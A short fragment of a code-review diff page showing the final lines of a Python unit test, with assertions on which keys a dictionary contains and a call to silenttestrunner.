318 self.assertNotIn('a', d)
319 self.assertNotIn('b', d)
320 self.assertIn('c', d)
321 self.assertIn('d', d)
322 self.assertIn('e', d)
323
220 324 if __name__ == '__main__':
221 325 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now